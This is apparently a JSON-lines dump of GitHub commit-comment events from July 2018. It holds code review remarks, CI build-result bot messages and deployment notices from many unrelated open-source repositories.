{"id":"7944696804","type":"CommitCommentEvent","actor":{"login":"carsonblack"},"repo":{"name":"carsonblack/therapyrealm-d8"},"payload":{"comment":{"id":29659139,"position":null,"line":null,"path":null,"commit_id":"2e704b472c892e09eb4146e5ae1c847397a583cb","created_at":"2018-07-10T15:43:54Z","updated_at":"2018-07-10T15:43:54Z","author_association":"OWNER","body":"Created multidev environment [therapyrealm-d8#ci-79](https://dashboard.pantheon.io/sites/1e2f72fb-b1d6-4944-b76a-de18b38c3d0c#ci-79).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-79-therapyrealm-d8.pantheonsite.io/)"}},"created_at":"2018-07-10T15:43:54Z"}
{"id":"7944701250","type":"CommitCommentEvent","actor":{"login":"HombreTech"},"repo":{"name":"FantLab/FantLab-client"},"payload":{"comment":{"id":29659148,"position":28,"line":72,"path":"app/src/main/kotlin/ru/fantlab/android/ui/widgets/FontTextView.kt","commit_id":"3a145fd0259d058bbfc94b9be04dcd9553a9f387","created_at":"2018-07-10T15:44:36Z","updated_at":"2018-07-10T15:44:36Z","author_association":"COLLABORATOR","body":"тогда имя переменной входного текста нужно изменить."}},"created_at":"2018-07-10T15:44:36Z"}
{"id":"7944702097","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-mcmcglmm-feedstock"},"payload":{"comment":{"id":29659150,"position":null,"line":null,"path":null,"commit_id":"95a5ce8347eb33909467ab8f0c40edee67bbf2bc","created_at":"2018-07-10T15:44:44Z","updated_at":"2018-07-10T15:44:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nick-youngblut were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T15:44:44Z"}
{"id":"7944707582","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29659158,"position":30,"line":50,"path":"artifacts/mods/gl_partycontrol.ssl","commit_id":"08b5e3a7694159336b9bba2ddb975baac3dca0f6","created_at":"2018-07-10T15:45:34Z","updated_at":"2018-07-10T15:45:34Z","author_association":"CONTRIBUTOR","body":"Well, like this.\r\nI also noticed that the block\r\n```\r\n      set_dude_obj(critter);\r\n      if hasGeckoSkinning then critter_add_trait(critter, TRAIT_PERK, PERK_gecko_skinning_perk, 1);\r\n```\r\nis also performed for the player, there needs to be a condition to refine."}},"created_at":"2018-07-10T15:45:34Z"}
{"id":"7944707971","type":"CommitCommentEvent","actor":{"login":"LukeZGD"},"repo":{"name":"LukeZGD/DDLC-3DS"},"payload":{"comment":{"id":29659159,"position":null,"line":null,"path":null,"commit_id":"6f66ba78bc2e7410d634a993fcfd7734be7cfb89","created_at":"2018-07-10T15:45:38Z","updated_at":"2018-07-10T15:45:38Z","author_association":"OWNER","body":"ok Source:tell is broken in LovePotion ahaha\r\nI'll revert it later"}},"created_at":"2018-07-10T15:45:38Z"}
{"id":"7944710475","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29659162,"position":8,"line":32,"path":"week-3(Orientation)/day2/TodoDb/TodoDb/Views/Todo/List.cshtml","commit_id":"ec3826d85277a43ad76c896870f6b1c1854bae05","created_at":"2018-07-10T15:46:03Z","updated_at":"2018-07-10T15:46:03Z","author_association":"NONE","body":"`List.cshtml` is nice, tables are fine, this is the level of frontend that we need from you right now.\r\nAlso this commit is full everything, every little change should be in a separate commit"}},"created_at":"2018-07-10T15:46:03Z"}
{"id":"7944710578","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29659163,"position":13,"line":13,"path":"src/runtime/hexagon_dma_pool.h","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-10T15:46:04Z","updated_at":"2018-07-10T15:46:04Z","author_association":"NONE","body":"yes, and thats implicitly done without a create_dma_engine() api. Why not do the opposite when the (last) virtual engine is de-allocated and not needing to expose this function (explicit have to call this function)?"}},"created_at":"2018-07-10T15:46:04Z"}
{"id":"7944713813","type":"CommitCommentEvent","actor":{"login":"crheller"},"repo":{"name":"LBHB/nems_db"},"payload":{"comment":{"id":29659168,"position":null,"line":null,"path":null,"commit_id":"c585ef985ce54e40e2002a0ad33984e0e34c5d6c","created_at":"2018-07-10T15:46:34Z","updated_at":"2018-07-10T15:46:34Z","author_association":"CONTRIBUTOR","body":"I didn't. I made a very minor change and it just compounded somehow. I'm not good with merge conflicts haha"}},"created_at":"2018-07-10T15:46:34Z"}
{"id":"7944716920","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29659175,"position":null,"line":null,"path":null,"commit_id":"0f623f6b3a3a934789cc1b3de698b05542ca485f","created_at":"2018-07-10T15:47:03Z","updated_at":"2018-07-10T15:47:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-10T15:47:03Z"}
{"id":"7944719543","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29659180,"position":29,"line":62,"path":"week-3(Orientation)/day2/TodoDb/TodoDb/Controllers/TodoController.cs","commit_id":"ec3826d85277a43ad76c896870f6b1c1854bae05","created_at":"2018-07-10T15:47:28Z","updated_at":"2018-07-10T15:47:28Z","author_association":"NONE","body":"the `ToDoController` skeleton is fine 👍 "}},"created_at":"2018-07-10T15:47:28Z"}
{"id":"7944724027","type":"CommitCommentEvent","actor":{"login":"audiooffler"},"repo":{"name":"audiooffler/hidapi"},"payload":{"comment":{"id":29659185,"position":null,"line":null,"path":null,"commit_id":"067e12e48287e531a0e928bac2768e021248ba0c","created_at":"2018-07-10T15:48:11Z","updated_at":"2018-07-10T15:48:11Z","author_association":"OWNER","body":"this was done under mac to be able compiling it with clang / xcode (C++11)"}},"created_at":"2018-07-10T15:48:11Z"}
{"id":"7944725393","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29659190,"position":12,"line":48,"path":"week-3(Orientation)/day2/TodoDb/TodoDb/Controllers/TodoController.cs","commit_id":"ec3826d85277a43ad76c896870f6b1c1854bae05","created_at":"2018-07-10T15:48:23Z","updated_at":"2018-07-10T15:48:23Z","author_association":"NONE","body":"for this route this naming is not too good, but does not care when it is working"}},"created_at":"2018-07-10T15:48:23Z"}
{"id":"7944726408","type":"CommitCommentEvent","actor":{"login":"ejgallego"},"repo":{"name":"ocaml/dune"},"payload":{"comment":{"id":29659193,"position":null,"line":null,"path":null,"commit_id":"6b1046c1ea0e853dc36d8233d5d6d1b4339a4e33","created_at":"2018-07-10T15:48:32Z","updated_at":"2018-07-10T15:48:32Z","author_association":"NONE","body":"Just a comment on the changelog and the renaming from `<` to `first-dep`, maybe the message should be tweaked as `first-dep` seems not to be a valid spec anymore cc: @diml @rgrinberg "}},"created_at":"2018-07-10T15:48:32Z"}
{"id":"7944727122","type":"CommitCommentEvent","actor":{"login":"Eduardvarenichko"},"repo":{"name":"Eduardvarenichko/Pixel"},"payload":{"comment":{"id":29659195,"position":1,"line":1,"path":"README.md","commit_id":"809e6c484e4cff67160bfb9b6cf3db4221593d86","created_at":"2018-07-10T15:48:39Z","updated_at":"2018-07-10T15:48:39Z","author_association":"OWNER","body":"809e6c4"}},"created_at":"2018-07-10T15:48:39Z"}
{"id":"7944728584","type":"CommitCommentEvent","actor":{"login":"smilesbarel"},"repo":{"name":"smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801"},"payload":{"comment":{"id":29659200,"position":null,"line":null,"path":null,"commit_id":"1ba3d8ed8de47f5494511c645f4520f79f0623ec","created_at":"2018-07-10T15:48:54Z","updated_at":"2018-07-10T15:48:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d55896e7-6059-447c-8cff-2ff80fc01048?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709212921801\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bd69d922-d1df-4f1e-8913-cd347139847e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709212921801\") deployed [sample-cloud-native-toolchain-tutorial-20180709212921801](https://github.com/smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801/releases/tag/deploy-ibm-yp-us-south-barel-us.ibm.com-test-20180710-154853 \"deploy-ibm-yp-us-south-barel-us.ibm.com-test-20180710-154853\") to [test](https://console.bluemix.net/apps/67f27499-fd47-43af-87b2-4cbccfd3df3f?env_id=ibm:yp:us-south \"ibm:yp:us-south:barel@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-10T15:48:54Z"}
{"id":"7944729952","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29659209,"position":null,"line":null,"path":null,"commit_id":"a4425b1e51b602ea99284c797afb464cc000fb6b","created_at":"2018-07-10T15:49:07Z","updated_at":"2018-07-10T15:49:07Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-19](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-10T15:49:07Z"}
{"id":"7944734602","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29659214,"position":21,"line":21,"path":"week-3(Orientation)/day2/TodoDb/TodoDb/Controllers/TodoController.cs","commit_id":"0c6c3ea5314e4e27f81194d99c2ffcb73f589d8f","created_at":"2018-07-10T15:49:51Z","updated_at":"2018-07-10T15:49:51Z","author_association":"NONE","body":"this stacked `[HttpGet]` attributes on each other are not the celanest solution"}},"created_at":"2018-07-10T15:49:51Z"}
{"id":"7944740728","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29659226,"position":13,"line":null,"path":"plugin/mutate/source/dextool/plugin/mutate/backend/database/schema.d","commit_id":"582f3d31972e135e84742bab506f0d2e55d18dc8","created_at":"2018-07-10T15:50:47Z","updated_at":"2018-07-10T15:50:47Z","author_association":"OWNER","body":"Please write a comment for what is changed"}},"created_at":"2018-07-10T15:50:47Z"}
{"id":"7944742012","type":"CommitCommentEvent","actor":{"login":"leventekobor94"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29659230,"position":1,"line":10,"path":"week-3(Orientation)/day2/TodoDb/TodoDb/Entities/TodoDbContext.cs","commit_id":"1e1b8d6b5ec47f9f1c8686dcb3aecbf28954e66e","created_at":"2018-07-10T15:51:00Z","updated_at":"2018-07-10T15:51:00Z","author_association":"NONE","body":"all set tup, this should work fine"}},"created_at":"2018-07-10T15:51:00Z"}
{"id":"7944750289","type":"CommitCommentEvent","actor":{"login":"mrgumorist"},"repo":{"name":"mrgumorist/CourseWork"},"payload":{"comment":{"id":29659246,"position":4,"line":191,"path":"Project11/Source.cpp","commit_id":"fb75f2086a0b222f7b9567e191656f6764e2dd6b","created_at":"2018-07-10T15:52:18Z","updated_at":"2018-07-10T15:52:18Z","author_association":"OWNER","body":"### ffff"}},"created_at":"2018-07-10T15:52:18Z"}
{"id":"7944750815","type":"CommitCommentEvent","actor":{"login":"smilesbarel"},"repo":{"name":"smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801"},"payload":{"comment":{"id":29659248,"position":null,"line":null,"path":null,"commit_id":"1ba3d8ed8de47f5494511c645f4520f79f0623ec","created_at":"2018-07-10T15:52:23Z","updated_at":"2018-07-10T15:52:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/d55896e7-6059-447c-8cff-2ff80fc01048?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180709212921801\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/bd69d922-d1df-4f1e-8913-cd347139847e?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180709212921801\") deployed [sample-cloud-native-toolchain-tutorial-20180709212921801](https://github.com/smilesbarel/sample-cloud-native-toolchain-tutorial-20180709212921801/releases/tag/deploy-ibm-yp-us-south-barel-us.ibm.com-prod-20180710-155223 \"deploy-ibm-yp-us-south-barel-us.ibm.com-prod-20180710-155223\") to [prod](https://console.bluemix.net/apps/6e3973f2-06ce-41f0-bc98-0dd03b3cf138?env_id=ibm:yp:us-south \"ibm:yp:us-south:barel@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-10T15:52:23Z"}
{"id":"7944755493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29659255,"position":null,"line":null,"path":null,"commit_id":"286587a3b56247392258ac0371846221ac3e85ae","created_at":"2018-07-10T15:53:06Z","updated_at":"2018-07-10T15:53:06Z","author_association":"NONE","body":"develop (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (764 of 2308 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-286587a3b56247392258ac0371846221ac3e85ae-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-33.1%25-red.png)</a> \n"}},"created_at":"2018-07-10T15:53:06Z"}
{"id":"7944757850","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29659262,"position":13,"line":951,"path":"src/Resources/contao/drivers/DC_Table.php","commit_id":"e45c20cc5c5b642ae0b17bc413275efc9836062e","created_at":"2018-07-10T15:53:28Z","updated_at":"2018-07-10T15:53:28Z","author_association":"MEMBER","body":"There should be probably a fallback for older DCAs? This is a breaking change."}},"created_at":"2018-07-10T15:53:28Z"}
{"id":"7944761245","type":"CommitCommentEvent","actor":{"login":"diml"},"repo":{"name":"ocaml/dune"},"payload":{"comment":{"id":29659270,"position":null,"line":null,"path":null,"commit_id":"6b1046c1ea0e853dc36d8233d5d6d1b4339a4e33","created_at":"2018-07-10T15:54:00Z","updated_at":"2018-07-10T15:54:00Z","author_association":"MEMBER","body":"Ah indeed. We replaced it by named dependencies:\r\n\r\n```\r\n(rule\r\n  (deps (:x file1) (:y file2) ...)\r\n  (action ... %{x} ... %{y} ...))\r\n```\r\n\r\nI'll update the changelog"}},"created_at":"2018-07-10T15:54:00Z"}
{"id":"7944761409","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":29659271,"position":null,"line":null,"path":null,"commit_id":"2d5e8d5eb4586e849ce67bf92014a5f49967a711","created_at":"2018-07-10T15:54:01Z","updated_at":"2018-07-10T15:54:01Z","author_association":"CONTRIBUTOR","body":"Command used:\r\nfind -name \"*.png\" -exec 'mogrify' {} \\;\r\n\r\nSome background:\r\nhttps://stackoverflow.com/questions/22745076/libpng-warning-iccp-known-incorrect-srgb-profile\r\n"}},"created_at":"2018-07-10T15:54:01Z"}
{"id":"7944772940","type":"CommitCommentEvent","actor":{"login":"stefanklein"},"repo":{"name":"SuperElastix/SuperElastix"},"payload":{"comment":{"id":29659290,"position":null,"line":null,"path":null,"commit_id":"4d28a7bd9d3864cb2ae35deeb0d071248eaf6712","created_at":"2018-07-10T15:55:37Z","updated_at":"2018-07-10T15:55:37Z","author_association":"MEMBER","body":"closes issue #260 "}},"created_at":"2018-07-10T15:55:37Z"}
{"id":"7944775870","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29659299,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T15:56:00Z","updated_at":"2018-07-10T15:56:00Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-10T15:56:00Z"}
{"id":"7944776593","type":"CommitCommentEvent","actor":{"login":"CedricYii"},"repo":{"name":"yiisoft/yii2-framework"},"payload":{"comment":{"id":29659300,"position":null,"line":null,"path":null,"commit_id":"8f5552372f3463b1557e4c771f4710bb75985c55","created_at":"2018-07-10T15:56:07Z","updated_at":"2018-07-10T15:56:07Z","author_association":"CONTRIBUTOR","body":"Thanks for your feedback. I was wondering what you were thinking about refactoring it...\r\nAs resetSequence() returns SQL string, one way would have been to introduce a new sql parsing into the execute() command... But it would be really hacky and would degrade performance for most queries.\r\nThat's why I choose to introduce a new command. One improvement may be to take it out from the db/oci/QueryBuilder.php and to manage it into a new db/oci/Command.php. However, this wouldn't solve your concern."}},"created_at":"2018-07-10T15:56:07Z"}
{"id":"7944779843","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29659304,"position":28,"line":28,"path":"content/security/other.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:56:31Z","updated_at":"2018-07-10T15:56:31Z","author_association":"CONTRIBUTOR","body":"Grammar: `Access to the secure credential datastore is tightly controlled and highly audited, and specific services or actions within those services are limited to only what is necessary.`"}},"created_at":"2018-07-10T15:56:31Z"}
{"id":"7944780692","type":"CommitCommentEvent","actor":{"login":"ararslan"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29659305,"position":null,"line":null,"path":null,"commit_id":"d8f70a5f4083273445b5f5fa9287bb341681f6f9","created_at":"2018-07-10T15:56:38Z","updated_at":"2018-07-10T15:56:38Z","author_association":"MEMBER","body":"Looks like a weird build fluke?\r\n\r\n@nanosoldier `runbenchmarks(ALL, isdaily=true)`"}},"created_at":"2018-07-10T15:56:38Z"}
{"id":"7944782709","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29659307,"position":null,"line":null,"path":null,"commit_id":"fd9a48c4b6737a9cd45c81aa2811488f6933e105","created_at":"2018-07-10T15:56:56Z","updated_at":"2018-07-10T15:56:56Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-10T15:56:56Z"}
{"id":"7944790665","type":"CommitCommentEvent","actor":{"login":"bjorn3"},"repo":{"name":"rhysd/vim.wasm"},"payload":{"comment":{"id":29659321,"position":null,"line":null,"path":null,"commit_id":"8fa579f3e49397a9acc5761288330dbb8b1ebd34","created_at":"2018-07-10T15:58:09Z","updated_at":"2018-07-10T15:58:09Z","author_association":"NONE","body":"How does this fix #5???"}},"created_at":"2018-07-10T15:58:09Z"}
{"id":"7944794822","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/freud-feedstock"},"payload":{"comment":{"id":29659325,"position":null,"line":null,"path":null,"commit_id":"fef9624df1f596643b9988b8b7fd96af96ece371","created_at":"2018-07-10T15:58:46Z","updated_at":"2018-07-10T15:58:46Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @joaander, @vyasr, @bdice were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T15:58:46Z"}
{"id":"7944796042","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29659328,"position":null,"line":null,"path":null,"commit_id":"59ebaea7eeed017f7eb2a4ccc9cce5e32ef8a6ed","created_at":"2018-07-10T15:58:57Z","updated_at":"2018-07-10T15:58:57Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.47.59ebaea7eeed017f7eb2a4ccc9cce5e32ef8a6ed](http://build.palaso.org/viewLog.html?buildId=124535&buildTypeId=HearThis_HearThisPullRequests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:13"}},"created_at":"2018-07-10T15:58:57Z"}
{"id":"7944799552","type":"CommitCommentEvent","actor":{"login":"ckilpat012"},"repo":{"name":"ckilpat012/testjs"},"payload":{"comment":{"id":29659336,"position":null,"line":null,"path":null,"commit_id":"5792ea5265f482c1cb2da96875699be3acbcf254","created_at":"2018-07-10T15:59:31Z","updated_at":"2018-07-10T15:59:31Z","author_association":"OWNER","body":"Please use this"}},"created_at":"2018-07-10T15:59:31Z"}
{"id":"7944803768","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29659343,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T16:00:12Z","updated_at":"2018-07-10T16:00:12Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2931 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T16:00:12Z"}
{"id":"7944806293","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29659350,"position":null,"line":null,"path":null,"commit_id":"9293e5a9b34eff274475759f21d10966c26086b1","created_at":"2018-07-10T16:00:33Z","updated_at":"2018-07-10T16:00:33Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `5f2a7bf0-845a-11e8-9467-db029bf9a7f9`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T16:00:33Z"}
{"id":"7944808229","type":"CommitCommentEvent","actor":{"login":"BeatrizCouce"},"repo":{"name":"BeatrizCouce/github-slideshow"},"payload":{"comment":{"id":29659354,"position":null,"line":null,"path":null,"commit_id":"be45c68d11e4ee9b76235f67850bba1a19728a28","created_at":"2018-07-10T16:00:51Z","updated_at":"2018-07-10T16:00:51Z","author_association":"OWNER","body":"Boa pinta"}},"created_at":"2018-07-10T16:00:51Z"}
{"id":"7944815224","type":"CommitCommentEvent","actor":{"login":"TimCliff"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":29659371,"position":223,"line":1748,"path":"libraries/chain/database.cpp","commit_id":"2fbebba18dd4dc277797547c2b5b3973e7efdbe4","created_at":"2018-07-10T16:01:59Z","updated_at":"2018-07-10T16:01:59Z","author_association":"CONTRIBUTOR","body":"@mvandeberg how does this `create_vesting` work with the new version of code? I don't see an equivalent `create_vesting2` call to replace what was removed here."}},"created_at":"2018-07-10T16:01:59Z"}
{"id":"7944818475","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29659378,"position":null,"line":null,"path":null,"commit_id":"574a728f83880f0fbd99c4af0f1518b9e94ea92d","created_at":"2018-07-10T16:02:29Z","updated_at":"2018-07-10T16:02:29Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MiniGameAPI/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a456d610-845a-11e8-86bd-53980f4be7fc`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T16:02:29Z"}
{"id":"7944819126","type":"CommitCommentEvent","actor":{"login":"lassoan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":29659380,"position":null,"line":null,"path":null,"commit_id":"2d5e8d5eb4586e849ce67bf92014a5f49967a711","created_at":"2018-07-10T16:02:35Z","updated_at":"2018-07-10T16:02:35Z","author_association":"CONTRIBUTOR","body":"Awesome, thank you!"}},"created_at":"2018-07-10T16:02:35Z"}
{"id":"7944819570","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29659386,"position":4,"line":68,"path":"android/src/com/frostwire/android/offers/MoPubAdNetwork.java","commit_id":"824a22c5b3f1a849b268f50af0752d735005f1ea","created_at":"2018-07-10T16:02:39Z","updated_at":"2018-07-10T16:02:39Z","author_association":"COLLABORATOR","body":"I reverted the change to not block the release, but I will make a second round to it"}},"created_at":"2018-07-10T16:02:39Z"}
